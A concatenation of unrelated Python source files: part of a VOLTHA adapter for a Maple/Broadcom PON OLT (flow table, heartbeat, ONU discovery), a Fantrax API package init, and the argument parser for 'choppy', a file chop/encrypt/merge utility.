self.devices_handlers[device.id] = MapleOltHandler(self, device.id)
reactor.callLater(0, self.devices_handlers[device.id].activate, device)
return device
def reconcile_device(self, device):
raise NotImplementedError()
def abandon_device(self, device):
raise NotImplementedError()
def disable_device(self, device):
raise NotImplementedError()
def reenable_device(self, device):
raise NotImplementedError()
def reboot_device(self, device):
raise NotImplementedError()
def download_image(self, device, request):
raise NotImplementedError()
def get_image_download_status(self, device, request):
raise NotImplementedError()
def cancel_image_download(self, device, request):
raise NotImplementedError()
def activate_image_update(self, device, request):
raise NotImplementedError()
def revert_image_update(self, device, request):
raise NotImplementedError()
def self_test_device(self, device):
"""
This is called to Self a device based on a NBI call.
:param device: A Voltha.Device object.
:return: Will return result of self test
"""
log.info('self-test-device', device=device.id)
raise NotImplementedError()
def delete_device(self, device):
raise NotImplementedError()
def get_device_details(self, device):
raise NotImplementedError()
def update_flows_bulk(self, device, flows, groups):
log.info('bulk-flow-update', device_id=device.id,
flows=flows, groups=groups)
assert len(groups.items) == 0, "Cannot yet deal with groups"
handler = self.devices_handlers[device.id]
return handler.update_flow_table(flows.items, device)
def update_flows_incrementally(self, device, flow_changes, group_changes):
raise NotImplementedError()
def send_proxied_message(self, proxy_address, msg):
log.info('send-proxied-message', proxy_address=proxy_address, msg=msg)
handler = self.devices_handlers[proxy_address.device_id]
handler.send_proxied_message(proxy_address, msg)
def receive_proxied_message(self, proxy_address, msg):
raise NotImplementedError()
def receive_packet_out(self, logical_device_id, egress_port_no, msg):
def ldi_to_di(ldi):
di = self.logical_device_id_to_root_device_id.get(ldi)
if di is None:
logical_device = self.adapter_agent.get_logical_device(ldi)
di = logical_device.root_device_id
self.logical_device_id_to_root_device_id[ldi] = di
return di
device_id = ldi_to_di(logical_device_id)
handler = self.devices_handlers[device_id]
handler.packet_out(egress_port_no, msg)
def receive_inter_adapter_message(self, msg):
pass
def create_interface(self, device, data):
raise NotImplementedError()
def update_interface(self, device, data):
raise NotImplementedError()
def remove_interface(self, device, data):
raise NotImplementedError()
def receive_onu_detect_state(self, device_id, state):
raise NotImplementedError()
def create_tcont(self, device, tcont_data, traffic_descriptor_data):
raise NotImplementedError()
def update_tcont(self, device, tcont_data, traffic_descriptor_data):
raise NotImplementedError()
def remove_tcont(self, device, tcont_data, traffic_descriptor_data):
raise NotImplementedError()
def create_gemport(self, device, data):
raise NotImplementedError()
def update_gemport(self, device, data):
raise NotImplementedError()
def remove_gemport(self, device, data):
raise NotImplementedError()
def create_multicast_gemport(self, device, data):
raise NotImplementedError()
def update_multicast_gemport(self, device, data):
raise NotImplementedError()
def remove_multicast_gemport(self, device, data):
raise NotImplementedError()
def create_multicast_distribution_set(self, device, data):
raise NotImplementedError()
def update_multicast_distribution_set(self, device, data):
raise NotImplementedError()
def remove_multicast_distribution_set(self, device, data):
raise NotImplementedError()
def suppress_alarm(self, filter):
raise NotImplementedError()
def unsuppress_alarm(self, filter):
raise NotImplementedError()
class MaplePBClientFactory(pb.PBClientFactory, ReconnectingClientFactory):
channel = None
maxDelay = 60
initialDelay = 15
def clientConnectionMade(self, broker):
log.info('pb-client-connection-made')
pb.PBClientFactory.clientConnectionMade(self, broker)
ReconnectingClientFactory.resetDelay(self)
def clientConnectionLost(self, connector, reason, reconnecting=0):
log.info('pb-client-connection-lost')
pb.PBClientFactory.clientConnectionLost(self, connector, reason,
reconnecting=1)
ReconnectingClientFactory.clientConnectionLost(self, connector, reason)
log.info('pb-client-connection-lost-retrying')
def clientConnectionFailed(self, connector, reason):
log.info('pb-client-connection-failed')
pb.PBClientFactory.clientConnectionFailed(self, connector, reason)
ReconnectingClientFactory.clientConnectionFailed(self, connector,
reason)
log.info('pb-client-connection-failed-retrying')
def disconnect(self, stopTrying=0):
if stopTrying:
ReconnectingClientFactory.stopTrying(self)
pb.PBClientFactory.disconnect(self)
def channel_disconnected(self, channel):
log.info('pb-channel-disconnected', channel=channel)
self.disconnect()
@inlineCallbacks
def getChannel(self):
if self.channel is None:
try:
self.channel = yield self.getRootObject()
self.channel.notifyOnDisconnect(self.channel_disconnected)
except Exception as e:
log.info('pb-client-failed-to-get-channel', exc=str(e))
self.channel = None
returnValue(self.channel)
class MapleOltHandler(object):
def __init__(self, adapter, device_id):
self.adapter = adapter
self.adapter_agent = adapter.adapter_agent
self.device_id = device_id
self.log = structlog.get_logger(device_id=device_id)
self.io_port = None
self.logical_device_id = None
self.interface = registry('main').get_args().interface
self.pbc_factory = MaplePBClientFactory()
self.pbc_port = 24498
self.tx_id = 0
self.onu_discovered_queue = DeferredQueue()
self.rx_handler = MapleOltRxHandler(self.device_id, self.adapter, self.onu_discovered_queue)
self.heartbeat_count = 0
self.heartbeat_miss = 0
self.heartbeat_interval = 1
self.heartbeat_failed_limit = 3
self.command_timeout = 5
self.pm_metrics = None
self.onus = {}
def __del__(self):
if self.io_port is not None:
registry('frameio').close_port(self.io_port)
def get_channel(self):
return self.pbc_factory.getChannel()
def get_proxy_channel_id_from_onu(self, onu_id):
return onu_id << 4
def get_onu_from_channel_id(self, channel_id):
return channel_id >> 4
def get_tunnel_tag_from_onu(self, onu):
return 1024 + (onu * 16)
def get_onu_from_tunnel_tag(self, tunnel_tag):
return (tunnel_tag - 1024) / 16
def get_new_onu_id(self, vendor, vendor_specific):
onu_id = None
for i in range(0, 63):
if i not in self.onus:
onu_id = i
break
if onu_id is not None:
self.onus[onu_id] = {'onu_id': onu_id,
'vendor': vendor,
'vendor_specific': vendor_specific}
return onu_id
def onu_exists(self, onu_id):
if onu_id in self.onus:
self.log.info('onu-exists',
onu_id=onu_id,
vendor=self.onus[onu_id]['vendor'],
vendor_specific=self.onus[onu_id]['vendor_specific'])
return self.onus[onu_id]['vendor'], self.onus[onu_id]['vendor_specific']
else:
self.log.info('onu-does-not-exist', onu_id=onu_id)
return None, None
def onu_serial_exists(self, sn_vendor, sn_vendor_specific):
for key, value in self.onus.iteritems():
if sn_vendor in value.itervalues() and sn_vendor_specific in value.itervalues():
self.log.info('onu-serial-number-exists',
onu_id=value['onu_id'],
vendor=sn_vendor,
vendor_specific=sn_vendor_specific,
onus=self.onus)
return value['onu_id']
self.log.info('onu-serial-number-does-not-exist',
vendor=sn_vendor,
vendor_specific=sn_vendor_specific,
onus=self.onus)
return None
@inlineCallbacks
def send_set_remote(self):
srv_ip = self.rx_handler.get_ip()
srv_port = self.rx_handler.get_port()
self.log.info('setting-remote-ip-port', ip=srv_ip, port=srv_port)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('set_remote', srv_ip, srv_port)
self.log.info('set-remote', data=data, ip=srv_ip, port=srv_port)
except Exception as e:
self.log.info('set-remote-exception', exc=str(e))
@inlineCallbacks
def send_config_classifier(self, olt_no, etype, ip_proto=None,
dst_port=None):
self.log.info('configuring-classifier',
olt=olt_no,
etype=etype,
ip_proto=ip_proto,
dst_port=dst_port)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('config_classifier',
olt_no,
etype,
ip_proto,
dst_port)
self.log.info('configured-classifier', data=data)
except Exception as e:
self.log.info('config-classifier-exception', exc=str(e))
@inlineCallbacks
def send_config_acflow(self, olt_no, onu_no, etype, ip_proto=None,
dst_port=None):
self.log.info('configuring-acflow',
olt=olt_no,
onu=onu_no,
etype=etype,
ip_proto=ip_proto,
dst_port=dst_port)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('config_acflow',
olt_no,
onu_no,
etype,
ip_proto,
dst_port)
self.log.info('configured-acflow', data=data)
except Exception as e:
self.log.info('config-acflow-exception', exc=str(e))
@inlineCallbacks
def send_connect_olt(self, olt_no):
self.log.info('connecting-to-olt', olt=olt_no)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('connect_olt', olt_no)
self.log.info('connected-to-olt', data=data)
except Exception as e:
self.log.info('connect-olt-exception', exc=str(e))
@inlineCallbacks
def send_activate_olt(self, olt_no):
self.log.info('activating-olt', olt=olt_no)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('activate_olt', olt_no)
self.log.info('activated-olt', data=data)
except Exception as e:
self.log.info('activate-olt-exception', exc=str(e))
@inlineCallbacks
def send_create_onu(self, olt_no, onu_no, serial_no, vendor_no):
self.log.info('creating-onu',
olt=olt_no,
onu=onu_no,
serial=serial_no,
vendor=vendor_no)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('create_onu',
olt_no,
onu_no,
serial_no,
vendor_no)
self.log.info('created-onu', data=data)
except Exception as e:
self.log.info('create-onu-exception', exc=str(e))
@inlineCallbacks
def send_configure_alloc_id(self, olt_no, onu_no, alloc_id):
self.log.info('configuring-alloc-id',
olt=olt_no,
onu=onu_no,
alloc_id=alloc_id)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('configure_alloc_id',
olt_no,
onu_no,
alloc_id)
self.log.info('configured-alloc-id', data=data)
except Exception as e:
self.log.info('configure-alloc-id-exception', exc=str(e))
@inlineCallbacks
def send_configure_unicast_gem(self, olt_no, onu_no, uni_gem):
self.log.info('configuring-unicast-gem',
olt=olt_no,
onu=onu_no,
unicast_gem_port=uni_gem)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('configure_unicast_gem',
olt_no,
onu_no,
uni_gem)
self.log.info('configured-unicast-gem', data=data)
except Exception as e:
self.log.info('configure-unicast-gem-exception', exc=str(e))
@inlineCallbacks
def send_configure_multicast_gem(self, olt_no, onu_no, multi_gem):
self.log.info('configuring-multicast-gem',
olt=olt_no,
onu=onu_no,
multicast_gem_port=multi_gem)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('configure_multicast_gem',
olt_no,
onu_no,
multi_gem)
self.log.info('configured-multicast-gem', data=data)
except Exception as e:
self.log.info('configure-multicast-gem-exception', exc=str(e))
@inlineCallbacks
def send_configure_onu(self, olt_no, onu_no, alloc_id, uni_gem, multi_gem):
self.log.info('configuring-onu',
olt=olt_no,
onu=onu_no,
alloc_id=alloc_id,
unicast_gem_port=uni_gem,
multicast_gem_port=multi_gem)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('configure_onu',
olt_no,
onu_no,
alloc_id,
uni_gem,
multi_gem)
self.log.info('configured-onu', data=data)
except Exception as e:
self.log.info('configure-onu-exception', exc=str(e))
@inlineCallbacks
def send_activate_onu(self, olt_no, onu_no):
self.log.info('activating-onu', olt=olt_no, onu=onu_no)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('activate_onu', olt_no, onu_no)
self.log.info('activated-onu', data=data)
except Exception as e:
self.log.info('activate-onu-exception', exc=str(e))
@inlineCallbacks
def heartbeat(self, device_id, state='run'):
"""Heartbeat OLT hardware
Call PB remote method 'heartbeat' to verify connectivity to OLT
hardware. If heartbeat missed self.heartbeat_failed_limit times OLT
adapter is set FAILED/UNREACHABLE.
No further action from VOLTHA core is expected as result of heartbeat
failure. Heartbeat continues following failure and once connectivity is
restored adapter state will be set to ACTIVE/REACHABLE
Arguments:
device_id: adapter device id
state: desired state (stop, start, run)
"""
self.log.debug('olt-heartbeat', device=device_id, state=state,
count=self.heartbeat_count)
def add_timeout(d, duration):
return reactor.callLater(duration, d.cancel)
def cancel_timeout(t):
if t.active():
t.cancel()
self.log.debug('olt-heartbeat-timeout-cancelled')
def heartbeat_alarm(device_id, status, heartbeat_misses=0):
try:
ts = arrow.utcnow().timestamp
alarm_data = {'heartbeats_missed':str(heartbeat_misses)}
alarm_event = self.adapter_agent.create_alarm(
id='voltha.{}.{}.olt'.format(self.adapter.name, device_id),
resource_id='olt',
type=AlarmEventType.EQUIPMENT,
category=AlarmEventCategory.PON,
severity=AlarmEventSeverity.CRITICAL,
state=AlarmEventState.RAISED if status else
AlarmEventState.CLEARED,
description='OLT Alarm - Heartbeat - {}'.format('Raised'
if status
else 'Cleared'),
context=alarm_data,
raised_ts = ts)
self.adapter_agent.submit_alarm(device_id, alarm_event)
except Exception as e:
log.exception('failed-to-submit-alarm', e=e)
if state == 'stop':
return
if state == 'start':
self.heartbeat_count = 0
self.heartbeat_miss = 0
try:
d = self.get_channel()
timeout = add_timeout(d, self.command_timeout)
remote = yield d
cancel_timeout(timeout)
d = remote.callRemote('heartbeat', self.heartbeat_count)
timeout = add_timeout(d, self.command_timeout)
data = yield d
cancel_timeout(timeout)
except Exception as e:
data = -1
self.log.info('olt-heartbeat-exception', data=data,
count=self.heartbeat_miss, exc=str(e))
if data != self.heartbeat_count:
# something is not right
self.heartbeat_miss += 1
self.log.info('olt-heartbeat-miss', data=data,
count=self.heartbeat_count, miss=self.heartbeat_miss)
else:
if self.heartbeat_miss > 0:
self.heartbeat_miss = 0
_device = self.adapter_agent.get_device(device_id)
_device.connect_status = ConnectStatus.REACHABLE
_device.oper_status = OperStatus.ACTIVE
_device.reason = ''
self.adapter_agent.update_device(_device)
heartbeat_alarm(device_id, 0)
_device = self.adapter_agent.get_device(device_id)
if (self.heartbeat_miss >= self.heartbeat_failed_limit) and \
(_device.connect_status == ConnectStatus.REACHABLE):
self.log.info('olt-heartbeat-failed', data=data,
count=self.heartbeat_miss)
_device = self.adapter_agent.get_device(device_id)
_device.connect_status = ConnectStatus.UNREACHABLE
_device.oper_status = OperStatus.FAILED
_device.reason = 'Lost connectivity to OLT'
self.adapter_agent.update_device(_device)
heartbeat_alarm(device_id, 1, self.heartbeat_miss)
self.heartbeat_count += 1
reactor.callLater(self.heartbeat_interval, self.heartbeat, device_id)
@inlineCallbacks
def arrive_onu(self):
self.log.info('arrive-onu waiting')
_data = yield self.onu_discovered_queue.get()
ok_to_arrive = False
olt_id = _data['_device_id']
pon_id = _data['_pon_id']
onu_id = self.onu_serial_exists(_data['_vendor_id'], _data['_vendor_specific'])
self.log.info('arrive-onu-detected', olt_id=olt_id, pon_ni=pon_id, onu_data=_data, onus=self.onus)
if _data['onu_id'] == 65535:
if onu_id is not None:
self.log.info('onu-activation-already-in-progress',
vendor=_data['_vendor_id'],
vendor_specific=_data['_vendor_specific'],
onus=self.onus)
else:
onu_id = self.get_new_onu_id(_data['_vendor_id'],
_data['_vendor_specific'])
self.log.info('assigned-onu-id',
onu_id=onu_id,
vendor=_data['_vendor_id'],
vendor_specific=_data['_vendor_specific'],
onus=self.onus)
ok_to_arrive = True
else:
vendor_id, vendor_specific = self.onu_exists(_data['onu_id'])
if vendor_id is not None and vendor_id == _data['_vendor_id'] and \
vendor_specific is not None and vendor_specific == _data['_vendor_specific']:
onu_id = _data['onu_id']
self.log.info('re-discovered-existing-onu',
onu_id=onu_id,
vendor=_data['_vendor_id'],
vendor_specific=_data['_vendor_specific'])
ok_to_arrive = True
else:
self.log.info('onu-id-serial-number-mismatch-detected',
onu_id=onu_id,
vendor_id=vendor_id,
new_vendor_id=_data['_vendor_id'],
vendor_specific=vendor_specific,
new_vendor_specific=_data['_vendor_specific'])
if onu_id is not None and ok_to_arrive:
self.log.info('arriving-onu', onu_id=onu_id)
tunnel_tag = self.get_tunnel_tag_from_onu(onu_id)
yield self.send_create_onu(pon_id,
onu_id,
_data['_vendor_id'],
_data['_vendor_specific'])
yield self.send_configure_alloc_id(pon_id, onu_id, tunnel_tag)
yield self.send_configure_unicast_gem(pon_id, onu_id, tunnel_tag)
yield self.send_configure_multicast_gem(pon_id, onu_id, 4000)
yield self.send_activate_onu(pon_id, onu_id)
self.adapter_agent.child_device_detected(
parent_device_id=self.device_id,
parent_port_no=100,
child_device_type='broadcom_onu',
proxy_address=Device.ProxyAddress(
device_id=self.device_id,
channel_id=self.get_proxy_channel_id_from_onu(onu_id), # c-vid
onu_id=onu_id,
onu_session_id=tunnel_tag # tunnel_tag/gem_port, alloc_id
),
admin_state=AdminState.ENABLED,
vlan=tunnel_tag,
serial_number=_data['_vendor_specific']
)
reactor.callLater(1, self.arrive_onu)
@inlineCallbacks
def activate(self, device):
self.log.info('activating-olt', device=device)
while self.onu_discovered_queue.pending:
_ = yield self.onu_discovered_queue.get()
if self.logical_device_id is None:
if not device.ipv4_address:
device.oper_status = OperStatus.FAILED
device.reason = 'No ipv4_address field provided'
self.adapter_agent.update_device(device)
return
device.root = True
device.vendor = 'Broadcom'
device.model = 'bcm68620'
device.serial_number = device.ipv4_address
self.adapter_agent.update_device(device)
nni_port = Port(
port_no=1,
label='NNI facing Ethernet port',
type=Port.ETHERNET_NNI,
admin_state=AdminState.ENABLED,
oper_status=OperStatus.ACTIVE
)
self.adapter_agent.add_port(device.id, nni_port)
self.adapter_agent.add_port(device.id, Port(
port_no=100,
label='PON port',
type=Port.PON_OLT,
admin_state=AdminState.ENABLED,
oper_status=OperStatus.ACTIVE
))
ld = LogicalDevice(
# not setting id and datapth_id will let the adapter
# agent pick id
desc=ofp_desc(
mfr_desc='cord project',
hw_desc='n/a',
sw_desc='logical device for Maple-based PON',
serial_num=uuid4().hex,
dp_desc='n/a'
),
switch_features=ofp_switch_features(
n_buffers=256, # TODO fake for now
n_tables=2, # TODO ditto
capabilities=( # TODO and ditto
OFPC_FLOW_STATS
| OFPC_TABLE_STATS
| OFPC_PORT_STATS
| OFPC_GROUP_STATS
)
),
root_device_id=device.id
)
ld_initialized = self.adapter_agent.create_logical_device(ld)
cap = OFPPF_1GB_FD | OFPPF_FIBER
self.adapter_agent.add_logical_port(ld_initialized.id, LogicalPort(
id='nni',
ofp_port=ofp_port(
port_no=0, # is 0 OK?
hw_addr=mac_str_to_tuple('00:00:00:00:00:%02x' % 129),
name='nni',
config=0,
state=OFPPS_LIVE,
curr=cap,
advertised=cap,
peer=cap,
curr_speed=OFPPF_1GB_FD,
max_speed=OFPPF_1GB_FD
),
device_id=device.id,
device_port_no=nni_port.port_no,
root_port=True
))
device = self.adapter_agent.get_device(device.id)
device.parent_id = ld_initialized.id
device.connect_status = ConnectStatus.UNREACHABLE
device.oper_status = OperStatus.ACTIVATING
self.adapter_agent.update_device(device)
self.logical_device_id = ld_initialized.id
device = self.adapter_agent.get_device(device.id)
self.log.info('initiating-connection-to-olt',
device_id=device.id,
ipv4=device.ipv4_address,
port=self.pbc_port)
try:
reactor.connectTCP(device.ipv4_address, self.pbc_port, self.pbc_factory)
device.connect_status = ConnectStatus.REACHABLE
device.oper_status = OperStatus.ACTIVE
device.reason = ''
self.adapter_agent.update_device(device)
except Exception as e:
self.log.info('get-channel-exception', exc=str(e))
device = self.adapter_agent.get_device(device.id)
device.oper_status = OperStatus.FAILED
device.reason = 'Failed to connect to OLT'
self.adapter_agent.update_device(device)
self.pbc_factory.stopTrying()
reactor.callLater(5, self.activate, device)
return
device = self.adapter_agent.get_device(device.id)
self.log.info('connected-to-olt',
device_id=device.id,
ipv4=device.ipv4_address,
port=self.pbc_port)
reactor.callLater(0, self.heartbeat, device.id, state='start')
yield self.send_set_remote()
yield self.send_connect_olt(0)
yield self.send_activate_olt(0)
# Open the frameio port to receive in-band packet_in messages
self.log.info('registering-frameio')
self.io_port = registry('frameio').open_port(
self.interface, self.rcv_io, is_inband_frame)
# Finally set the initial PM configuration for this device
# TODO: if arrive_onu not working, the following PM stuff was commented out during testing
self.pm_metrics=MapleOltPmMetrics(device)
pm_config = self.pm_metrics.make_proto()
log.info("initial-pm-config", pm_config=pm_config)
self.adapter_agent.update_device_pm_config(pm_config,init=True)
# Apply the PM configuration
self.update_pm_metrics(device, pm_config)
reactor.callLater(1, self.arrive_onu)
self.log.info('olt-activated', device=device)
def rcv_io(self, port, frame):
self.log.info('received', iface_name=port.iface_name,
frame_len=len(frame))
pkt = Ether(frame)
if pkt.haslayer(Dot1Q):
outer_shim = pkt.getlayer(Dot1Q)
if isinstance(outer_shim.payload, Dot1Q):
inner_shim = outer_shim.payload
cvid = inner_shim.vlan
logical_port = cvid
popped_frame = (
Ether(src=pkt.src, dst=pkt.dst, type=inner_shim.type) /
inner_shim.payload
)
kw = dict(
logical_device_id=self.logical_device_id,
logical_port_no=logical_port,
)
self.log.info('sending-packet-in', **kw)
self.adapter_agent.send_packet_in(
packet=str(popped_frame), **kw)
@inlineCallbacks
def update_flow_table(self, flows, device):
self.log.info('bulk-flow-update', device_id=device.id, flows=flows)
def is_downstream(port):
return not is_upstream(port)
def is_upstream(port):
return port == 100 # Need a better way
for flow in flows:
_type = None
_ip_proto = None
_port = None
_vlan_vid = None
_udp_dst = None
_udp_src = None
_ipv4_dst = None
_ipv4_src = None
_metadata = None
_output = None
_push_tpid = None
_field = None
try:
_in_port = fd.get_in_port(flow)
assert _in_port is not None
if is_downstream(_in_port):
self.log.info('downstream-flow')
elif is_upstream(_in_port):
self.log.info('upstream-flow')
else:
raise Exception('port should be 1 or 2 by our convention')
_out_port = fd.get_out_port(flow) # may be None
self.log.info('out-port', out_port=_out_port)
for field in fd.get_ofb_fields(flow):
if field.type == fd.ETH_TYPE:
_type = field.eth_type
self.log.info('field-type-eth-type',
eth_type=_type)
elif field.type == fd.IP_PROTO:
_ip_proto = field.ip_proto
self.log.info('field-type-ip-proto',
ip_proto=_ip_proto)
elif field.type == fd.IN_PORT:
_port = field.port
self.log.info('field-type-in-port',
in_port=_port)
elif field.type == fd.VLAN_VID:
_vlan_vid = field.vlan_vid & 0xfff
self.log.info('field-type-vlan-vid',
vlan=_vlan_vid)
elif field.type == fd.VLAN_PCP:
_vlan_pcp = field.vlan_pcp
self.log.info('field-type-vlan-pcp',
pcp=_vlan_pcp)
elif field.type == fd.UDP_DST:
_udp_dst = field.udp_dst
self.log.info('field-type-udp-dst',
udp_dst=_udp_dst)
elif field.type == fd.UDP_SRC:
_udp_src = field.udp_src
self.log.info('field-type-udp-src',
udp_src=_udp_src)
elif field.type == fd.IPV4_DST:
_ipv4_dst = field.ipv4_dst
self.log.info('field-type-ipv4-dst',
ipv4_dst=_ipv4_dst)
elif field.type == fd.IPV4_SRC:
_ipv4_src = field.ipv4_src
self.log.info('field-type-ipv4-src',
ipv4_dst=_ipv4_src)
elif field.type == fd.METADATA:
_metadata = field.table_metadata
self.log.info('field-type-metadata',
metadata=_metadata)
else:
raise NotImplementedError('field.type={}'.format(
field.type))
for action in fd.get_actions(flow):
if action.type == fd.OUTPUT:
_output = action.output.port
self.log.info('action-type-output',
output=_output, in_port=_in_port)
elif action.type == fd.POP_VLAN:
self.log.info('action-type-pop-vlan',
in_port=_in_port)
elif action.type == fd.PUSH_VLAN:
_push_tpid = action.push.ethertype
log.info('action-type-push-vlan',
push_tpid=_push_tpid, in_port=_in_port)
if action.push.ethertype != 0x8100:
self.log.error('unhandled-tpid',
ethertype=action.push.ethertype)
elif action.type == fd.SET_FIELD:
_field = action.set_field.field.ofb_field
assert (action.set_field.field.oxm_class ==
OFPXMC_OPENFLOW_BASIC)
self.log.info('action-type-set-field',
field=_field, in_port=_in_port)
if _field.type == fd.VLAN_VID:
self.log.info('set-field-type-vlan-vid',
vlan_vid=_field.vlan_vid & 0xfff)
else:
self.log.error('unsupported-action-set-field-type',
field_type=_field.type)
else:
log.error('unsupported-action-type',
action_type=action.type, in_port=_in_port)
if is_upstream(_in_port) and \
(_type == 0x888e or
(_type == 0x800 and (_ip_proto == 2 or _ip_proto == 17))):
yield self.send_config_classifier(0, _type, _ip_proto, _udp_dst)
yield self.send_config_acflow(0, _in_port, _type, _ip_proto, _udp_dst)
except Exception as e:
log.exception('failed-to-install-flow', e=e, flow=flow)
@inlineCallbacks
def send_proxied_message(self, proxy_address, msg):
if isinstance(msg, Packet):
msg = str(msg)
self.log.info('send-proxied-message',
proxy_address=proxy_address.channel_id,
msg=msg)
try:
remote = yield self.get_channel()
yield remote.callRemote("send_omci",
0,
0,
self.get_onu_from_channel_id(proxy_address.channel_id),
msg)
onu, rmsg = yield self.rx_handler.receive_omci_msg()
self.adapter_agent.receive_proxied_message(proxy_address, rmsg)
except Exception as e:
self.log.info('send-proxied_message-exception', exc=str(e))
def packet_out(self, egress_port, msg):
self.log.debug('sending-packet-out',
egress_port=egress_port,
msg_hex=hexify(msg))
pkt = Ether(msg)
out_pkt = (
Ether(src=pkt.src, dst=pkt.dst) /
Dot1Q(vlan=4091) /
Dot1Q(vlan=egress_port, type=pkt.type) /
pkt.payload
)
self.io_port.send(str(out_pkt))
@inlineCallbacks
def update_pm_metrics(self, device, pm_config):
self.log.info('update-pm-metrics', device_id=device.id,
pm_config=pm_config)
remote = yield self.get_channel()
self.pm_metrics.update(device, pm_config, remote)
|
py | 1a49efa3f1257ab61b03d064009f6d4135060d88 | from .fantrax import Fantrax
from .user import FantraxUser
from .league import League
from .roster import Roster
from .player import Player
from .constants import URL, VERSION, FANTRAX_TOKEN
from .exceptions import FantraxAPIKeyMissingError, FantraxRequestError, \
FantraxConnectionError, FantraxRosterError
|
py | 1a49f094a015b2cc297025fb129931d713580267 | #! usr/bin/env/ python3
"""Parser for CLI user options"""
import argparse
import getpass
import os
import sys
from choppy.version import VERSION
# ------------------------------------------------------------------------------
def confirm_directory(subdir):
if os.path.exists(subdir):
if not os.path.isdir(subdir):
return False
else:
os.mkdir(subdir)
return True
def validate_directory(user_dir):
user_input = user_dir[:]
user_dir = os.path.abspath(user_dir)
status = confirm_directory(user_dir)
if status:
return user_dir
else:
msg = 'Unable to validate output directory: {}'.format(user_input)
raise argparse.ArgumentTypeError(msg)
def load_pw_options(subcmd, pw_only=False):
"""Initializes key and password input options.
Args:
subcmd: Argparse sub_parser instance
pw_only: bool - flag to alter help text
"""
if pw_only:
grp_heading = 'Password Input'
i_help = 'file containing password for key derivation'
else:
grp_heading = 'Key / Password Input'
i_help = 'file containing key or password'
pwgrp = subcmd.add_argument_group(grp_heading)
pwgrp.add_argument(
'-i', type=argparse.FileType('rb'),
dest='kp_file', metavar='(k|pw) infile', help=i_help)
pwgrp.add_argument(
'-s', '--salt', type=argparse.FileType('rb'), metavar='salt-file',
help='file containing salt for key derivation - required for use with password')
pwgrp.add_argument(
'-t', '--iterations', type=int, default=10**5, metavar='n',
help='perform n iterations in key derivation - defaults to 100,000')
def load_keypass_options(subcmd, pfx):
"""Initializes key and password selection options.
Args:
subcmd: Argparse sub_parser instance
pfx: str - str prefix to designate encrypt or decrypt in help text
"""
keypass_grp = subcmd.add_argument_group('Key / Password Select')
kpg = keypass_grp.add_mutually_exclusive_group(required=True)
kpg.add_argument(
'--use-key', action='store_true', dest='use_key',
help='enables usage of key for {}cryption - enter key in secure prompt or specify file with -i'.format(pfx))
kpg.add_argument(
'--use-pw', action='store_true', dest='use_pw',
help='enables usage of password, salt, iterations for {}cryption - enter pw in secure prompt or specify file with -i'.format(pfx))
load_pw_options(subcmd)
def parse_arguments():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(
prog='choppy', description='chop -> encrypt -> (?) -> decrypt -> merge',
allow_abbrev=False)
parser.set_defaults(kw='', pw='')
parser.set_defaults(passwordfile=None, keyfile=None, kp_file=None)
parser.set_defaults(use_pw=False, use_key=False)
subparsers = parser.add_subparsers(
dest='command', metavar='(chop | merge | derive | gen)',
help='see docs/usage for more information')
chop_aliases = ['chp', 'c']
merge_aliases = ['mrg', 'm']
derive_aliases = ['der', 'd']
gen_aliases = ['gen', 'g']
cmds = ('chop', 'merge', 'derive', 'generate')
cmd_alias = (chop_aliases, merge_aliases, derive_aliases, gen_aliases)
cmd_map = dict(zip(cmds, cmd_alias))
chp = subparsers.add_parser('chop', aliases=chop_aliases)
mrg = subparsers.add_parser('merge', aliases=merge_aliases)
derkey = subparsers.add_parser('derive', aliases=derive_aliases)
gen_util = subparsers.add_parser('generate', aliases=gen_aliases)
# --------------------------------------------------------------------------
chop_grp = chp.add_argument_group('Chop')
chop_grp.add_argument(
'input', nargs='+', type=argparse.FileType('rb'), metavar='infile',
help='input file(s) to chop and encrypt')
chop_grp.add_argument(
'-n', type=int, default=10, dest='partitions', metavar='n',
help='create n partitions from each input file - default: 10')
chop_grp.add_argument(
'-w', '--wobble', type=int, default=0, metavar='n', choices=range(1, 100),
help='randomize partition size (1-99)')
chop_grp.add_argument(
'-r', '--randfn', action='store_true',
help='use random file names for partitions instead of sequential numeric')
load_keypass_options(chp, pfx='en')
# --------------------------------------------------------------------------
mrg_grp = mrg.add_argument_group('Merge')
mrg_grp.add_argument(
'input', nargs='+', type=argparse.FileType('rb'), metavar='infile',
help='input files to decrypt and merge')
load_keypass_options(mrg, pfx='de')
# --------------------------------------------------------------------------
load_pw_options(derkey, pw_only=True)
# --------------------------------------------------------------------------
gen_grp = gen_util.add_argument_group('Utilities')
gen_grp.add_argument(
'-k', '--key', action='store_true', dest='genkey',
help='write file containing randomly generated base64 encoded 32 byte key')
gen_grp.add_argument(
'-p', '--pw', type=int, default=0, metavar='n', dest='genpw',
help='write file containing randomly generated password of n characters')
gen_grp.add_argument(
'-s', '--salt', type=int, default=0, metavar='n', dest='gensalt',
help='write file containing randomly generated salt of n bytes - Standard: 32')
gen_grp.add_argument(
'-r', '--repeat', type=int, default=1, metavar='n',
help='generate n files per command')
# --------------------------------------------------------------------------
for grp in (chp, mrg, derkey, gen_util):
grp.add_argument(
'-o', '--outdir', type=validate_directory, default=os.getcwd(),
metavar='dir', help='output directory')
grp.add_argument(
'-q', '--quiet', action='store_true',
help='disable all console text output')
parser.add_argument('-v', '--version', action='version', version=VERSION)
args = parser.parse_args()
if args.command not in cmd_map:
for k, v in cmd_map.items():
if args.command in v:
args.command = k
break
if args.command != 'generate':
if args.use_key:
if not args.kp_file:
args.kw = getpass.getpass(prompt='Key: ')
else:
args.keyfile = args.kp_file
elif args.use_pw or args.command == 'derive':
args.use_pw = True
if not args.salt:
print('>>> salt file required for password use')
sys.exit(0)
if not args.kp_file:
args.pw = getpass.getpass(prompt='Password: ')
else:
args.passwordfile = args.kp_file
return args
# ------------------------------------------------------------------------------
if __name__ =='__main__':
args = parse_arguments()
print('\n')
for k, v in vars(args).items():
print(k, ':', v)
print('\n')
|
py | 1a49f0d489c8d87d271181595104d8f2721804e0 | import json
from utils import dict_manip as dm
